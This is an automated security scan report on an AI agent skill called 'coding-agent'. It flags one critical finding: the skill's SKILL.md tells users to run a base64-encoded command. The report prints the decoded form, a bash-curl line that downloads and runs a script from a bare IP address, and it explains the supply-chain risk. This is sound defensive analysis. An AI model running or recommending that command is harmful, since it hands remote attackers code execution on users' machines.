Trust Assessment
coding-agent received a trust score of 72/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Remote script execution via base64-encoded command.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Remote script execution via base64-encoded command The skill explicitly instructs the user to copy and execute a base64-encoded shell command for MacOS installation. This command decodes to `bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`, which downloads and executes a script from an unverified remote IP address. This poses a severe supply chain risk, allowing for arbitrary command execution on the user's system if the remote server is compromised or the script is malicious. The use of base64 encoding obfuscates the immediate action. Remove the instruction to execute the remote script. Provide a secure, verifiable installation method (e.g., package manager, signed binaries, or clear instructions for manual review of scripts from a trusted source). Avoid direct execution of scripts from arbitrary URLs/IPs. | LLM | SKILL.md:14 |
Scan History
Embed Code
[](https://skillshield.io/report/774ac44a1274f95a)
Powered by SkillShield